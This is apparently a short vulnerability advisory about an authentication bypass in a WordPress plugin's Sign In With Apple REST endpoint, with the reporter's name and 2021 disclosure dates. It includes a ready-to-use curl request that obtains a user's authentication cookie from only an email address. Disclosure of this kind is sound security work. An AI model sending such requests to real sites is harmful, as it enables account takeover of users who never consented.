The plugin had an authentication bypass with Sign In With Apple allowing unauthenticated users to recover an authentication cookie with only an email address.
The plugin must have a valid purchase code for the request to work curl -X GET --header 'Content-Type: application/json' --header 'Accept: application/json' -d '{ "email": "[email protected]" }' https://example.com/wp-json/api/flutter_user/apple_login
Vincent Datrier
Vincent Datrier
Yes
2021-02-02 (about 1 years ago)
2021-02-02 (about 1 years ago)
2021-02-18 (about 1 years ago)